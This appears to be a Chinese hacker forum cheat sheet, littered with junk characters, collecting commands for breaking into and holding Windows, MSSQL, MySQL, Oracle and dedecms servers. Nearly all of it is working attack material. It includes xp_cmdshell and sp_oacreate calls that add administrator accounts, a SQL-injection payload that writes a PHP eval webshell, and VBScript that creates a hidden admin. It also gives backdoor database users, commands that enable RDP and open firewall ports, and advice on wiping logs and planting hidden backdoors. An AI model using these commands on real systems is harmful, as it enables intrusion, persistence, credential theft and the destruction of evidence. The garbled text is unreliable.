. I) | T: B9 `. Y1.net user administrator /passwordreq:no5 M' o K3 d8 t: \7 d( I/ X
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了; R; j/ |# a% X1 T3 h6 L
2.比较巧妙的建克隆号的步骤
8 r9 m' \" `7 ?先建一个user的用户
$ l( ?" k# Z8 O Y0 \& V7 X然后导出注册表。然后在计算机管理里删掉2 a1 ^: P: z6 X# Z; E
在导入,在添加为管理员组# y0 m+ ?9 Q0 T* P
3.查radmin密码5 \' a/ _# X7 U) V
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg: N* V/ l, Y& q( s2 o& b E
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]: P1 d3 j/ Q, x' O" c( H9 ^
建立一个"services.exe"的项
5 }) O! A0 Z# U' U) x: V再在其下面建立(字符串值)
; Q) m# p7 z- G0 d1 O/ X键值为mu ma的全路径9 x v' A5 W/ Q+ P6 G9 D- ~' o1 F
5.runas /user:guest cmd% o* u x3 a" N3 S( x+ N% s
测试用户权限!
; I# C% M2 S+ x3 S* e$ l Y& i& C6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?+ R, ?% o! x8 r/ s+ j, P7 H
7.入侵后漏洞修补、痕迹清理,后门置放:9 L; A8 _3 g& ]: \) I
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
/ O% ]+ d ~( \. i) {2 z" G8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c" z2 i* t. _7 b/ r) o
$ c5 c. e6 T2 ^) E8 r7 T" B5 j
for example
# P) _6 t/ r# w6 \/ O1 b' A* r6 V: z. Z9 X7 h& g" y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
% d( T u9 h" ^ N# p5 M4 X; f# [8 A( z
8 l! \$ ]2 o& R* adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'2 ~. L7 [6 |( @% Y
; s- c2 B' W) m* J
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
; d0 s% ?* v5 O7 F如果要启用的话就必须把他加到高级用户模式
t3 N/ h# S$ c5 f% t4 \' F; {可以直接在注入点那里直接注入
& j" t5 t; N6 z% p3 yid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--, R8 ]3 v; ]% x( s9 c
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--. \- T8 D2 I3 o# f0 U
或者& e( ^) t/ P! |' c' @" P
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
( ]! G- O$ o6 ~* [- I1 O5 n来恢复cmdshell。
H* r6 C2 f1 n+ R7 j% G! j% X* a b# v* K' g7 Y
分析器
. m' p, j! ]: K& R. J8 ?" HEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--& S J. r$ V0 h5 u7 L6 p2 `
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")6 y* {0 V/ k! d3 A( b, j+ F
10.xp_cmdshell新的恢复办法
2 W3 k. ~+ @1 q9 [+ Exp_cmdshell新的恢复办法5 A! A$ l J! e. c3 b
扩展储存过程被删除以后可以有很简单的办法恢复:
6 N$ H& g& V) |删除! d( F2 k6 X! m5 [% B; `
drop procedure sp_addextendedproc. ~% s" x, K" @5 J+ K% W
drop procedure sp_oacreate; Q2 Y/ }: |4 i3 w+ ]
exec sp_dropextendedproc 'xp_cmdshell'
2 o5 ?* o" B9 D# i" l# f
7 x: m8 v, V6 L Y恢复7 p7 W2 U) S; O# v" ~
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
3 b& }% r7 J+ g& I) `$ D3 M. \9 Cdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
1 ], p! Z7 u; F& n# F, @/ w9 n0 L* _
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
: ~& P. f K! @5 u) X
* ?" m0 g' l2 O( j( c, B-----------------------------2 e3 L1 \, |* }! N$ U
1 \+ C, o: x# O8 d8 U9 c5 g6 V
删除扩展存储过过程xp_cmdshell的语句:
+ o2 R* F4 w+ `( b/ g# p- W P* Fexec sp_dropextendedproc 'xp_cmdshell'
& j' v. x# S1 L- U Q" }9 v
( u% ?) |8 Z7 r; Z4 F* _9 j5 s恢复cmdshell的sql语句
! J$ y/ |- v7 d# i- a% Bexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'; X" q6 I$ k* D& ?
7 O( t3 L2 N' D# H
{ W% B p* N7 ~开启cmdshell的sql语句
' m1 M' }- D1 p# n" M6 k7 W* K' R" A! Q* C& `5 w7 y
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'! ?* G# C; m7 ]7 S
% I; G" u! F9 m2 I3 ]$ {8 U3 g* J
判断存储扩展是否存在. v* |4 X( r1 }1 Y
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'+ h9 ?4 e# ?% B3 t' u4 F
返回结果为1就ok. P+ Y+ Z( F+ ^ A' t- L$ A
6 U, \/ N; t: T0 o恢复xp_cmdshell
& W5 {6 R% x+ y7 ~4 ~% b; n$ v+ `exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
1 b; `4 a: G" U返回结果为1就ok! t3 G! X. C& J; i4 x0 s
. o5 Y" G9 c7 F! F
否则上传xplog7.0.dll5 {0 k$ X$ `( B; `. ~2 h
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'- r6 v$ j' ?) b6 s- s
+ {, X4 i4 {. |9 N9 u堵上cmdshell的sql语句
! x+ F5 e' Q }) Y `4 c2 Ksp_dropextendedproc "xp_cmdshel7 r- f; z+ b' L% E6 e
-------------------------
; L5 h! }8 }- Q. F: f, G& h清除3389的登录记录用一条系统自带的命令:
3 P& e: v/ u k- ~3 k- M+ Lreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
1 I8 b* w3 S/ p" S' E- v: i6 h# D1 y/ y
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
$ A# f, J0 D. t5 _ P在 mysql里查看当前用户的权限
3 c4 o7 j: y6 N) [6 N' R& R! k' m" Xshow grants for
2 K, J2 T) q5 k5 s- t+ T2 d. D, t8 h/ Z h) C& b0 W x/ K
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。! t5 R, F0 A4 A/ h
4 u) M8 Z. q n, x( a( |
; W2 ^" A7 I( I/ |" X2 M& DCreate USER 'itpro'@'%' IDENTIFIED BY '123';0 ?2 B; ^. J3 t& @- \% `! ?' x m
" v, M) `6 O' }* s+ P1 S
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
! g1 n2 i/ U9 q% U) }2 b5 x- z0 O! E+ Z w$ C7 ~
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
; }6 p' k. a6 `3 y7 E6 }+ f V2 n& \, W5 z+ ~% g# H' o( ?
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
. F9 D" K _, j, Z
2 E' I0 P7 H8 _7 B+ G: X搞完事记得删除脚印哟。
( C& Q; y8 C# P2 h9 @' R% Z
: x/ \$ ]/ d, M8 HDrop USER 'itpro'@'%';; n: W9 Z2 i0 i W" |* N1 w
% `: f; G+ Q2 v- j
Drop DATABASE IF EXISTS `itpro` ;
. d* q r/ p. S" ^9 w5 r; B6 q$ ~( [9 ~# R1 P
当前用户获取system权限+ G. ]# u$ B s% p7 G) i/ K' `! Y9 Z
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
+ |: R _3 V$ \$ dsc start SuperCMD o# o: v: w0 X, U
程序代码
% I( B+ f* c: r! U<SCRIPT LANGUAGE="VBScript">
9 s4 m2 e. c1 w+ t vset wsnetwork=CreateObject("WSCRIPT.NETWORK")9 J o; G5 S: a6 `/ c1 t& B" t) ~
os="WinNT://"&wsnetwork.ComputerName3 M# g8 v. W0 D- ?, @
Set ob=GetObject(os)
1 h/ R6 \; l& M5 l; L. sSet oe=GetObject(os&"/Administrators,group")
" g0 V! R- s7 v0 }Set od=ob.Create("user","nosec")9 \7 N/ O1 ~& _9 B# b7 k! z
od.SetPassword "123456abc!@#"
# B: A+ x/ c. L$ P! Q' [od.SetInfo% j/ }! j) N. B V& c
Set of=GetObject(os&"/nosec",user)
4 t1 u9 S: E$ T9 L, q/ E# y; a. @oe.add os&"/nosec"# k# j, e1 D6 a+ L3 l5 [
</Script>, J O( G% i3 a0 M! Q& a
<script language=javascript>window.close();</script>) x- V. B! ~8 w8 N* M
4 ~1 g( U5 E) t+ x
) R4 a2 H( R1 C W$ W: V- o$ ]$ X! F' l9 Z
! `( d0 p" D; B9 Z9 b) r
突破验证码限制入后台拿shell8 u* G) n: l3 A6 d% h0 g
程序代码8 P# M$ D! y7 E( _6 O3 g# V
REGEDIT4
2 [4 d0 e. K1 N0 G; J[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] - } E1 S& O) P! j/ m
"BlockXBM"=dword:00000000. w1 e3 S6 k5 K! M' J* C
) ~* r6 ]/ A! F保存为code.reg,导入注册表,重器IE
7 g& w0 L: a- i0 m, Q, u2 U( S1 Q就可以了
) u7 d5 w p6 {9 P, T$ \( Vunion写马
/ V1 a; w+ K. J. t5 b程序代码
. ]( n: x% n. Z- swww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*6 Q, w E8 B) W9 X! H- O
, q2 w, B, t3 Y3 R# ~8 |& v$ b应用在dedecms注射漏洞上,无后台写马
( E6 q' |$ N" W, Ldedecms后台,无文件管理器,没有outfile权限的时候
4 \; |) K- O$ z9 ~. w5 S0 ]在插件管理-病毒扫描里( N* j4 v; g% ~/ V8 T
写一句话进include/config_hand.php里9 G% q' _4 L/ \. O
程序代码9 p" x/ w: E$ t( c) @4 O; o' P
>';?><?php @eval($_POST[cmd]);?>
. _0 b: s: `. E$ f) T7 g b0 U; _* p9 f E* N
- M/ {7 Z0 J9 V' a6 d如上格式
+ g5 M1 F) W2 I8 Y, U' y1 n5 \0 y( h" Z$ k/ V
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解+ M$ Z! A( b F* D0 V" N. k G
程序代码: U5 E: f* x* n/ T) z1 i1 r
select username,password from dba_users;% ?8 G a. [9 q0 V+ S( F
" F0 \( G% k% I: M& X7 o* z6 v- z/ l, @* U3 T+ h
mysql远程连接用户
: W) ~, j6 |$ |# |; m: C程序代码
1 ^( y$ H$ P R2 w6 e% t# L4 m
* r0 U7 m) j7 MCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';& a6 y0 ] O' d6 A8 @# a$ G- V% @
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION4 n+ q; i4 z, o. F
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 ] H9 r' a1 @
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
0 ~1 Z: W0 p: w- f
6 n- g. i! I+ M
0 R& G# M k0 d( N6 t1 m+ s
/ a3 Q' ?+ J' n- z! a
+ {% X! n [& S3 E: q8 xecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0% n- F/ [/ j; o4 w( [2 I
% l% D. W! R# @# j. S- X+ k
1.查询终端端口
- X4 S/ L% ^' J& [, d5 c7 }1 V/ ~; c
& E+ ]6 M8 Y) W7 axp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
$ w# {% {7 g, S- U# U: v# K" q- ]. F6 z& F
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
& S0 a1 k* F, x' [type tsp.reg
$ s5 ?/ {' p# p4 o. p/ w2 w* N" K2 {3 Y" s {, {
2.开启XP&2003终端服务3 w0 _) x, a& M' ]* u9 x/ o( N3 _
- t9 f4 |- i4 L0 m- \5 y
/ g, \0 q) I3 [& C- E8 R3 O8 RREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
# i: c$ \6 s I5 W) n0 D
1 m9 }; z5 c* }: c
# n4 k7 i& ^, b7 I7 r: @REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f4 q0 O1 R5 B/ \8 s, T1 C
, R; h5 d' ]0 `$ G
3.更改终端端口为20008(0x4E28)5 L% Y1 W( h; q2 C( ^0 U
* x# T4 c% P/ E/ X8 c- q. t2 QREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f8 U3 s: s+ z* \6 t( d3 u
; M# `; h! l W6 Z! c2 l: B `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
0 G' r/ ?; o2 z) Z7 d6 h
% c! Y$ f' Y: ^! d3 t: v4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制4 C0 D7 W1 K8 {! N) r1 k2 y& D3 k
2 C& d8 m; X9 \
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f! a/ F- m- Z& k' w# v& v% M: V9 O& c
* p! \2 U. [$ F4 ?8 b/ L) ^- P8 n: N, J# c" g( R# v
5.开启Win2000的终端,端口为3389(需重启)
( }" i, c0 `0 E
" L/ C# ?- K+ m$ Q# @echo Windows Registry Editor Version 5.00 >2000.reg 0 Z& g: m/ T2 W, q
echo. >>2000.reg
+ E3 h, V" F- ^8 E/ [" Mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
9 \+ y- F# Z4 N$ b0 Z+ Oecho "Enabled"="0" >>2000.reg
' [: v1 s0 y2 g6 T5 H! Qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 7 k& M. P6 v" {5 `
echo "ShutdownWithoutLogon"="0" >>2000.reg
5 C' a* K6 d: a, R3 c' L0 m2 M: zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
- c) Q) Y8 j: U& m/ f) W/ Lecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
- c7 j6 \0 t0 a- n0 P4 [+ wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
* n7 g* e) Y5 z' e/ G- Decho "TSEnabled"=dword:00000001 >>2000.reg
" s# \6 `6 ^% Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
6 l% r+ v# a' M: }2 n/ oecho "Start"=dword:00000002 >>2000.reg $ ~/ _0 p! F. b/ d) d2 z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 2 L) _+ S! F+ N. K
echo "Start"=dword:00000002 >>2000.reg ' g r1 H5 A" }) t
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 2 t' r% O3 D2 L3 c/ m! E6 k
echo "Hotkey"="1" >>2000.reg 6 B, r$ e: y/ Z( j( p+ V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
! P+ g' i: e% M( w' y1 I4 O7 D! _echo "ortNumber"=dword:00000D3D >>2000.reg 5 x1 |( E$ h! O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
8 d8 Z7 J# J/ Q& R# a* @0 aecho "ortNumber"=dword:00000D3D >>2000.reg
; E% ^* e" U3 o$ M. q0 n. M% U Q; @; L# [! y9 Q- a
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
5 A* A2 E* B6 n0 [) z6 o) w* K3 C' m1 f
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf) W% i) [3 \2 H" ~, S* L! L
(set inf=InstallHinfSection DefaultInstall)
1 P: Z5 @4 D0 @- ]3 \ D( }# X' Vecho signature=$chicago$ >> restart.inf
' F1 D4 A% \7 d5 G; gecho [defaultinstall] >> restart.inf
' D( o$ |+ ~* Y! M& r, C3 I* u: t- F+ |rundll32 setupapi,%inf% 1 %temp%\restart.inf7 b& P# i+ E4 ?
; n' r9 ~6 a% g5 l
/ x7 J% \( _/ Y$ J; ?/ s7.禁用TCP/IP端口筛选 (需重启)3 t1 S4 r7 e% Q6 ~
+ e7 {/ r/ i& n# N2 X6 i4 RREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f$ X4 e3 D5 c7 }. B, o
+ g2 q/ @1 Q, `8.终端超出最大连接数时可用下面的命令来连接
/ @* i9 ?0 O2 ^3 K$ p" o* O+ D) U1 A) J! F( D
mstsc /v:ip:3389 /console1 V% a* z6 W2 q7 m
3 O) L! I- Y' o
9.调整NTFS分区权限0 F8 N5 g1 k- o) Q! V! L0 I
- W! p9 Q) ^( J+ y/ acacls c: /e /t /g everyone:F (所有人对c盘都有一切权利), k$ r. o$ j3 F( c* L5 }# Y
( z- w& j" e$ j. C) Z. _cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
3 u- \# D. K/ h6 K9 F; T
: O% F4 [5 A, Y! R/ m3 J+ e& Q------------------------------------------------------
. _: u5 ?9 C6 [ ^0 X. x" V' _3389.vbs
3 I5 d+ [ _+ M) |9 kOn Error Resume Next4 m1 e _1 z5 |* I
const HKEY_LOCAL_MACHINE = &H80000002
" W9 x9 q1 q R! LstrComputer = "."
& H- u5 U& l! M; _# Q- zSet StdOut = WScript.StdOut( P6 X6 O$ N, G7 |: E. S
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
8 N3 b' r, `$ t$ P# x- kstrComputer & "\root\default:StdRegProv")5 ?+ A9 l2 F- e3 E2 s2 h1 d/ H% c
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
* B: U& h m6 N7 f: b! W5 K- Q8 @& }oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath% k7 }4 h7 k" M6 q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"3 l% p* c+ C) c+ h6 O6 U
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath! U- e9 ]# g( d% v* X
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"6 a) ^# l) \7 ^# S" d
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
, i4 k, D$ d" m+ G4 u, istrValueName = "fDenyTSConnections"
7 G) ~/ Z3 G: T$ T. WdwValue = 0# X D/ o0 |( H* m5 v2 s
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! {) E- B T- ^! y6 k& jstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" q+ C/ _7 x8 L/ ^4 ^% b9 b
strValueName = "ortNumber"
+ L# ~8 b% y9 B6 b5 K; ]8 ]dwValue = 3389/ g a* q# ~, b2 a
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue+ s& V9 K0 }( {( f1 H, H0 w
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"! E% G) b' i0 O; B- |
strValueName = "ortNumber"& j( ^6 Z* X3 V, Q2 L" M
dwValue = 33899 i, x( W/ P! Z5 D, T. \
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue2 I: ~$ N; _& L% b
Set R = CreateObject("WScript.Shell")
" H6 F! F8 E- Y; E- `R.run("Shutdown.exe -f -r -t 0") 2 f, w; R5 q: y0 J9 O
. K% N8 p) q/ O- q1 X3 [6 `
删除awgina.dll的注册表键值
7 R6 }$ q7 X' _7 j" _; a程序代码
, ^) x3 B1 S3 z0 v2 x/ z, w
" v4 j+ J$ `5 j% F5 n* Rreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
# ]( j0 t9 O# C2 C! f% b
% i1 s9 W+ Y5 ]; d4 K) | o- o" E
% ?( p. I1 o2 ~; g- n L P
$ y7 Y u: h2 L2 j9 g1 ]0 f) ?0 _- n1 n v: ?7 F& F
程序代码
' h1 f9 h2 F# V5 i2 |+ c2 iHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash% W0 w, Z) m7 k3 A) q. F7 |
5 ]) B' T: r! _设置为1,关闭LM Hash* R0 c7 P: `0 V) _
: M7 y- _+ J% r; e' r- a
数据库安全:入侵Oracle数据库常用操作命令5 c/ x0 i$ |+ z# k- v
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。9 J% C" E: m0 {' g' A$ C
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
j' p# U! M, l. V! L2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;. }- {% F. U- W7 `- |
3、SQL>connect / as sysdba ;(as sysoper)或
$ G0 x9 |) [( W" P: x! `* Uconnect internal/oracle AS SYSDBA ;(scott/tiger)7 \$ K# r/ m, j2 P/ z0 s' g$ c+ l* C0 ~
conn sys/change_on_install as sysdba;" z$ o4 h0 g( ]8 Q- M0 h$ k$ t
4、SQL>startup; 启动数据库实例. G2 e- ]+ V2 @* a: P V" h3 o$ y/ ?( z
5、查看当前的所有数据库: select * from v$database;
' O2 k x1 V3 A X/ r' I; k' {select name from v$database;% I: Y1 X w/ F8 O& ~
6、desc v$databases; 查看数据库结构字段: o/ r8 h) U# h6 m
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
3 L6 ~& V( w/ ~& E8 M+ {2 DSQL>select * from V_$PWFILE_USERS;5 S) V1 V3 h. i
Show user;查看当前数据库连接用户2 ^* ]! w2 U& k' y
8、进入test数据库:database test;! r o7 H: t/ ?- \* g
9、查看所有的数据库实例:select * from v$instance;3 X* o! \8 @. g7 K8 h
如:ora9i# j2 {8 H% @( t, D! ?
10、查看当前库的所有数据表:7 _/ ?: T" ]* i' V% s
SQL> select TABLE_NAME from all_tables;9 f/ d+ W: k* t- B6 ]: Z2 U
select * from all_tables;$ G" _5 |1 U* @0 ^% j0 R: r
SQL> select table_name from all_tables where table_name like '%u%';' \' X; G0 V0 q( Z9 _- `
TABLE_NAME( @ o2 h) _' C" a+ [" z
------------------------------
" e" W. m! M/ M2 t9 N_default_auditing_options_
% F/ a5 Q! m2 Y: y4 K$ @" C) D11、查看表结构:desc all_tables;5 u1 p, ]( p7 P% I
12、显示CQI.T_BBS_XUSER的所有字段结构:
6 D9 Z5 t8 U. a; `5 B5 W5 u2 p4 Bdesc CQI.T_BBS_XUSER;6 r4 Y7 `. s5 i& b7 o5 h' v
13、获得CQI.T_BBS_XUSER表中的记录:! Q- u. m% s7 j ]" i. `- I+ g& [" h
select * from CQI.T_BBS_XUSER;
; e7 c) ?( U. U; n u5 D14、增加数据库用户:(test11/test) y; z$ }' H( c1 ?
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;( I7 k; O+ M8 c. k
15、用户授权:
2 u3 M) D. u+ S) M& n6 S3 _grant connect,resource,dba to test11;
% X- O, @1 c4 t4 B' D0 Ggrant sysdba to test11;! a# |- l( |$ n
commit;0 V: A$ o. ?8 a0 y
16、更改数据库用户的密码:(将sys与system的密码改为test.)
6 D4 I" z; a( Q P+ halter user sys indentified by test;
" T. O3 B1 M3 P0 _alter user system indentified by test;+ o1 H6 i! |0 \$ ~- J# t1 i3 u" B/ ?" G
3 [: I- j8 _7 u5 UapplicationContext-util.xml
1 \ x9 T+ q2 E: Y' QapplicationContext.xml5 ~9 ]6 N; U3 q2 M+ S
struts-config.xml5 l. z9 |3 d! b( O% ]" W+ Y' f
web.xml* c3 i/ ^# F% J6 k% O
server.xml; o; Z+ w N4 v; m" T
tomcat-users.xml% t9 v% S0 o7 a' ]6 A
hibernate.cfg.xml6 o3 W. u$ \ v2 n1 K- z5 F7 l6 [+ W
database_pool_config.xml7 s2 C6 o" k7 |; Y5 B+ s' F
; `2 X4 P4 S! x
7 Z- I" h/ x/ c' Y' n
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
. U+ Q3 D0 x& P( W0 {\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini$ I* v2 l5 L& x6 o' S, a; P3 L! ^
\WEB-INF\struts-config.xml 文件目录结构" Z* l% k" a- f% e
# p% H0 @! A1 y: _7 m" J+ u X5 M
spring.properties 里边包含hibernate.cfg.xml的名称6 ?( ~; n% G/ q% H }
, P+ }. f+ \. B3 k3 ?8 i$ w% {
2 H6 Z$ q9 @+ }# OC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml5 q3 w* c$ A$ @8 y& e$ X7 Y
9 U& m5 d9 M7 ~0 G6 @- K( _
如果都找不到 那就看看class文件吧。。
& }( o! ]9 e: e9 \, d3 w7 I# y Z: S8 Z, d0 M
测试1:# @8 b" G$ s! E+ h3 h2 u, b' C( j
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1" Y ^3 O9 d/ @* t
7 e9 t1 F U6 v; ^# B
测试2:8 d+ [3 F/ @/ z. a, G
# v/ G/ P$ Q! f- g b9 h: ~3 F
create table dirs(paths varchar(100),paths1 varchar(100), id int)
- a( p4 e y$ O# w# f% I' I1 e2 N8 m# u. H: s* C" i- j
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--: K+ o& D# A& U$ `
' G( l6 F7 d4 i6 j9 b' r
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1# j* M/ p% o% N. `$ E9 ~3 d# R
; H3 _2 s* t( V1 s2 L
查看虚拟机中的共享文件:9 ]" N) A$ }* C9 e' g$ ]
在虚拟机中的cmd中执行$ T/ c+ r( z% j( c! Z$ W( {8 R
\\.host\Shared Folders
( g3 S8 c0 M/ [9 F) ?! m( o: u) o0 Z9 X' D
cmdshell下找终端的技巧
. J7 C8 y& z7 p9 H0 T找终端: 7 E: n D7 `1 A2 |
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
0 l2 D% D: m M8 A0 { 而终端所对应的服务名为:TermService
1 y8 ?" g" x& F- ]第二步:用netstat -ano命令,列出所有端口对应的PID值!
6 Q- J3 ^1 C, y! ^: [4 A1 c# v8 E8 h 找到PID值所对应的端口
, f$ p" J8 J" A1 b( S# }" }, E
/ H& k3 ^6 c/ K- \4 X2 n) ]; s* z3 O) |查询sql server 2005中的密码hash, i- U# w% z2 p" N/ ~5 _& g
SELECT password_hash FROM sys.sql_logins where name='sa'
9 a- e+ b& A- u3 l" Q( CSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
/ a) {) _+ N E6 aaccess中导出shell
